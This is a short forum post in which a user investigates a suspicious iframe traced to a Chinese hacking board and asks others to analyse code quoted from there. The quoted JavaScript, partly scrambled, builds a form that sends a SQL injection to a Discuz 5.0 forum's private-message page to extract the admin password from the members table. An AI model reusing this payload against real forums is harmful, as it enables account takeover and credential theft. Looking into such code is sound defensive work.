
Originally Posted by
cassiraa
interestingly though, the iframe links to patching.net, and to http:// www .patching. net/bbs/viewdoc_61875_18 DOT html [hotlink broken so people don't stupidly click it] is a post on
http://www.patching------------.net/bbs/bbs_18.html, a chinese BBS which has various hacks and exploits [the poster has a FFXI icon too], But the post is 3/15/2007, so it really is that old.
The interesting part in that post is that obfuscated document.write thats translates to this:
Code:
<SCRIPT LANGUAGE="JavaScript">
<!--
test='width="760"<table align="center" border="0" cellspacing="0"><form cellpadding="0" height="22" method="post"><tr><td Exp</td></tr><tr><td class="td">Dz5.0 height="18" class="trHead"></td></tr><tr><td <input class="td">Url: type="text" name="theAction" value="http://3800hk.com" id="theAction" onBlur=this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&pmsubmit=yes">
<input size="50" type="hidden" name="the2Action" value="">Hash: id="the2Action" type="text" <input value="0094b488">Msgto:<input name="formhash" name="msgto" type="text" value="jackal">
<input size="10" name="subject" type="hidden" value="aa"><input size="10" name="message" type="hidden" <input value="aa">SQL: size="100" type="text" value="0) name="msgtobuddys[]" select union from password,2,0 where cdb_members class="td" uid=1/*"></td></tr><tr><td type="submit" align="center"><input value=" name="Submit" " GOGOGO type="reset" onClick="this.form.action=this.form.the2Action.value;"><input value=" name="Submit32" "></td></tr><tr><td Reset height="22" class="trHead"></td></tr><tr><td class="td">Powered align="right" <a By title="QQ:50192528">Jackal</a> href="http://hi.baidu.com/delover/" </tr> 2007.3</td> </table> </form>';
document.write(ReplaceDemo(test))
//-->
</SCRIPT>>
Analysis anyone?